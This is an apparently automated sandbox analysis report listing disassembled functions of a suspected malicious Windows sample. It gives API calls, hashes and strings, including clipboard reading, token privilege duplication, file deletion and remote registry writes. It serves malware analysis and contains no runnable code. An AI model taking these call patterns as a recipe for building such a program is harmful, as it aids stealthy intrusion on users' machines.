Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction ID: ba0f48970ac1c16c37bb855342ce8f827fb62ae197cd14ca9e87d649fb54df7b
Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction Fuzzy Hash: 8001DB72211B126ED7245B38DC06B6BBF98FB45790F108529F51ACA1D1EA31E8408798

Function 005F495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 005F4998

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 7fe011ce3960d6d9ce4b43f314b5023982c6a6de66dee042587e4faf43064142
Instruction ID: 34d2e945202e94d163c63e70dbf269d13e2b66c4afaf6874a90ad9cad32cab1e
Opcode Fuzzy Hash: 7fe011ce3960d6d9ce4b43f314b5023982c6a6de66dee042587e4faf43064142
Instruction Fuzzy Hash: 35F0313560810AAF9B14FB65D84ECAF7BBCFF89360B004056F9089B251EE70AD81CB54

Function 005BDC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 005A0FE6: std::exception::exception.LIBCMT ref: 005A101C
Part of subcall function 005A0FE6: __CxxThrowException@8.LIBCMT ref: 005A1031

_memmove.LIBCMT ref: 005BDC8B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction ID: 87bb8a5e140058732ace373ba5cab9aab42d1f283d0a33b650a94f3c6a078dc4
Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction Fuzzy Hash: E9F0F974604102DFD715DF68C985E19BFE1BF5A304B24849CE5899B3A2E732E811CF92

Function 00594A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00594AA4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 6cb62e1dfc5a45183366baae5af7b3777976bbacf73db320fe9c71452fc46e7a
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 11F085B6500208BFDF108F94DC04DEFBF7EFB89320F004599F9045A210D232EA218BA0

Function 00594A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,005927AF,?,00000001), ref: 00594A63

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a5cdc02bc43eb464771e9c324507534505addb11b94b9db4879b0305626a1a22
Instruction ID: 80bad94d3d377a145d7dcb393ebaaa2d47bc1227d8ed1b702a66b8ddf9b7c3ab
Opcode Fuzzy Hash: a5cdc02bc43eb464771e9c324507534505addb11b94b9db4879b0305626a1a22
Instruction Fuzzy Hash: CCF0F271145702CFCB349F64E894C1ABFE2BF143293249A2EE19682610C7319D84DF44

Function 00594AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00594AD0

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 7e7ffacf956f9f418ab2eb0679225615c10ab8496ffcc3b77d307485b10bb260
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: A1F0F87240020DFFDF05CF94C945EAABB79FB15324F208589F9198B252D336DA21AB91

Function 005A09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005A09E4

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b4d7664439d4d5ad8fdf59ec8eec718759d819dd7c3d01c898763e639d5e8a05
Instruction ID: e6d07e273ba490eca845bfe1db1379b7ecc5694bc065b91f3da406440d8c3299
Opcode Fuzzy Hash: b4d7664439d4d5ad8fdf59ec8eec718759d819dd7c3d01c898763e639d5e8a05
Instruction Fuzzy Hash: 66E0863290012957CB2196989C19FEA77DDEBC9690F0441B6FC09D7204D960AC818695

Function 005E4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,005E3BFE), ref: 005E4FED

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b1dadd54783c763700bbdc49982411f0ae712bee23fa1b19fa20acd9f33f0f14
Instruction ID: 5c45fe63f86a2115437be693cbc852f047b0c595a5a6b94e004e7bcc2f4179b7
Opcode Fuzzy Hash: b1dadd54783c763700bbdc49982411f0ae712bee23fa1b19fa20acd9f33f0f14
Instruction Fuzzy Hash: ADB092340006E066AE2C1E3D19490993B066842BA97D82B82E8B8856E1D239888BA920

Function 005A547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 005A5486

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 4a73d072302f284eac7261339aedd788044635cdc6faabfced9447e7c121c252
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: D6B0927644020CB7CE012A82EC03E593F29AB85668F408020FB0C1C162B673A6A09689

Function 005EC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 005E4005: FindFirstFileW.KERNEL32(?,?), ref: 005E407C
Part of subcall function 005E4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 005E40CC
Part of subcall function 005E4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 005E40DD
Part of subcall function 005E4005: FindClose.KERNEL32(00000000), ref: 005E40F4

GetLastError.KERNEL32 ref: 005EC292

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: a564061ca87d06c93d7bdcece15ffbc963d6d2b0ebd1b537b33e9f8a1b80feb3
Instruction ID: 9d1b996dd40c40b47ae86aa4c0eb33430b6cff230ee39281620e5ceb4c10981b
Opcode Fuzzy Hash: a564061ca87d06c93d7bdcece15ffbc963d6d2b0ebd1b537b33e9f8a1b80feb3
Instruction Fuzzy Hash: 65F082312102114FDB14EF59D848B69BBE5BF88320F058419F9459B351CB70FC01CB94

Non-executed Functions

Function 0060D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0060D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0060D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0060D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0060D2B8
SendMessageW.USER32 ref: 0060D2E1
_wcsncpy.LIBCMT ref: 0060D359
GetKeyState.USER32(00000011), ref: 0060D37A
GetKeyState.USER32(00000009), ref: 0060D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0060D39D
GetKeyState.USER32(00000010), ref: 0060D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0060D3D0
SendMessageW.USER32 ref: 0060D3F7
SendMessageW.USER32(?,00001030,?,0060B9BA), ref: 0060D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0060D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0060D526
SetCapture.USER32(?), ref: 0060D52F
ClientToScreen.USER32(?,?), ref: 0060D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0060D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0060D5BB
ReleaseCapture.USER32 ref: 0060D5C6
GetCursorPos.USER32(?), ref: 0060D600
ScreenToClient.USER32(?,?), ref: 0060D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0060D669
SendMessageW.USER32 ref: 0060D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0060D6D4
SendMessageW.USER32 ref: 0060D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0060D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0060D733
GetCursorPos.USER32(?), ref: 0060D753
ScreenToClient.USER32(?,?), ref: 0060D760
GetParent.USER32(?), ref: 0060D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0060D7E9
SendMessageW.USER32 ref: 0060D81A
ClientToScreen.USER32(?,?), ref: 0060D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0060D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0060D8D2
SendMessageW.USER32 ref: 0060D8F5
ClientToScreen.USER32(?,?), ref: 0060D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0060D97B

Part of subcall function 005829AB: GetWindowLongW.USER32(?,000000EB), ref: 005829BC

GetWindowLongW.USER32(?,000000F0), ref: 0060DA17

Strings

@GUI_DRAGID, xrefs: 0060D562
F, xrefs: 0060D8FB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 8917161b826fa278511ddf8e4e401896aa7a7084010be8ec38fc7d941b37e4f4
Instruction ID: c8b348cd34fd32a8f9c2d76ac1afc5cab7d6a555b1cf273396d94909d9774f18
Opcode Fuzzy Hash: 8917161b826fa278511ddf8e4e401896aa7a7084010be8ec38fc7d941b37e4f4
Instruction Fuzzy Hash: A442AE34244341AFDB28DF68C848BABBBE6FF89310F144659F695872E0CB71D855CB91

Function 005D8F2E Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 005D9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005D93E3
Part of subcall function 005D9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005D9410
Part of subcall function 005D9399: GetLastError.KERNEL32 ref: 005D941D

_memset.LIBCMT ref: 005D8F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005D8FC3
CloseHandle.KERNEL32(?), ref: 005D8FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005D8FEB
GetProcessWindowStation.USER32 ref: 005D9004
SetProcessWindowStation.USER32(00000000), ref: 005D900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005D9028

Part of subcall function 005D8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005D8F27), ref: 005D8DFE
Part of subcall function 005D8DE9: CloseHandle.KERNEL32(?,?,005D8F27), ref: 005D8E10

Strings

winsta0, xrefs: 005D8FE6
default, xrefs: 005D9023
, xrefs: 005D8F80
winsta0\default, xrefs: 005D90A9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0$winsta0\default
API String ID: 2063423040-1685893292
Opcode ID: 2d8124ac6e1512b5646efc2f24e39b3c176f665fd10f99e38657e0f5926ad2a9
Instruction ID: 092d1f89b9c3ff8eead32834e4e3dfd6921b920816d7a9709bbdd0b136dc4066
Opcode Fuzzy Hash: 2d8124ac6e1512b5646efc2f24e39b3c176f665fd10f99e38657e0f5926ad2a9
Instruction Fuzzy Hash: B681497190020ABFDF21DFA8CC49AEE7F7ABF44314F18815BF910A62A1D7718A55DB60

Function 005F4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00610980), ref: 005F465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 005F466A
GetClipboardData.USER32(0000000D), ref: 005F4672
CloseClipboard.USER32 ref: 005F467E
GlobalLock.KERNEL32(00000000), ref: 005F469A
CloseClipboard.USER32 ref: 005F46A4
GlobalUnlock.KERNEL32(00000000), ref: 005F46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 005F46C6
GetClipboardData.USER32(00000001), ref: 005F46CE
GlobalLock.KERNEL32(00000000), ref: 005F46DB
GlobalUnlock.KERNEL32(00000000), ref: 005F470F
CloseClipboard.USER32 ref: 005F481F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 729a489468a51b823943abd1df47f116bb0e077e5bf84a1895af9c64fae05ff2
Instruction ID: 2f94cfbc1b390d37f6e431eeaa0e89255b59376671807701231b798747153c2d
Opcode Fuzzy Hash: 729a489468a51b823943abd1df47f116bb0e077e5bf84a1895af9c64fae05ff2
Instruction Fuzzy Hash: CC519F31244206ABEB00EF60DC89FBF7BA9BFC4B40F04452AF645D2191DF74D9458B66

Function 005EF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005EF5F9
_wcscmp.LIBCMT ref: 005EF60E
_wcscmp.LIBCMT ref: 005EF625
GetFileAttributesW.KERNEL32(?), ref: 005EF637
SetFileAttributesW.KERNEL32(?,?), ref: 005EF651
FindNextFileW.KERNEL32(00000000,?), ref: 005EF669
FindClose.KERNEL32(00000000), ref: 005EF674
FindFirstFileW.KERNEL32(*.*,?), ref: 005EF690
_wcscmp.LIBCMT ref: 005EF6B7
_wcscmp.LIBCMT ref: 005EF6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 005EF6E0
SetCurrentDirectoryW.KERNEL32(0063B578), ref: 005EF6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 005EF708
FindClose.KERNEL32(00000000), ref: 005EF715
FindClose.KERNEL32(00000000), ref: 005EF727

Strings

S^, xrefs: 005EF6E2
*.*, xrefs: 005EF68B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S^
API String ID: 1803514871-147831899
Opcode ID: bc1c86391f886e84e2d689bcddf23340dcb21609a59879f4a0c9bbdbfbafc426
Instruction ID: 7e3652f5e81628a1824c156090ac9bc0a6eb95c1b017144a42e4ff2f9d5524ba
Opcode Fuzzy Hash: bc1c86391f886e84e2d689bcddf23340dcb21609a59879f4a0c9bbdbfbafc426
Instruction Fuzzy Hash: 2631C1716002596BEF149FB5AC4DADE7BADEF49321F144166F844D20A0DF70CA84CB60

Function 005ECD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005ECDD0
FindClose.KERNEL32(00000000), ref: 005ECE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005ECE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005ECE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 005ECE87
__swprintf.LIBCMT ref: 005ECED3
__swprintf.LIBCMT ref: 005ECF16

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

__swprintf.LIBCMT ref: 005ECF6A

Part of subcall function 005A38C8: __woutput_l.LIBCMT ref: 005A3921

__swprintf.LIBCMT ref: 005ECFB8

Part of subcall function 005A38C8: __flsbuf.LIBCMT ref: 005A3943
Part of subcall function 005A38C8: __flsbuf.LIBCMT ref: 005A395B

__swprintf.LIBCMT ref: 005ED007
__swprintf.LIBCMT ref: 005ED056
__swprintf.LIBCMT ref: 005ED0A5

Strings

%4d, xrefs: 005ECF10
%4d%02d%02d%02d%02d%02d, xrefs: 005ECECD
%02d, xrefs: 005ECF5E, 005ECF68, 005ECFB6, 005ED005, 005ED054, 005ED0A3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 394a92736b09b53312788c7798e3bad4d79a4d4f360b59e6322e97f2d6aedeff
Instruction ID: b1efa927e1a250d0f4af6aed0354f8226a452fb37a612eda17021f783ba6a737
Opcode Fuzzy Hash: 394a92736b09b53312788c7798e3bad4d79a4d4f360b59e6322e97f2d6aedeff
Instruction Fuzzy Hash: D5A13BB1404306ABD714EBA4C989DAFBBECFF94704F400919F985D2191EB34EA49CB62

Function 00600EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00600FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00610980,00000000,?,00000000,?,?), ref: 00601021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00601069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006010F2
RegCloseKey.ADVAPI32(?), ref: 00601412
RegCloseKey.ADVAPI32(00000000), ref: 0060141F

Strings

REG_BINARY, xrefs: 006013AD
REG_SZ, xrefs: 00601130
REG_EXPAND_SZ, xrefs: 0060108F
REG_MULTI_SZ, xrefs: 006011DA
REG_QWORD, xrefs: 00601360
REG_DWORD, xrefs: 006012E3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: a3e74716fdbe056ecc1880e2f9a65a736c72a2de0135a39afdd2594acb703212
Instruction ID: 020dc0113ebe3f8663b188a47aa65f27416efea8021d789fcc13416a7f797035
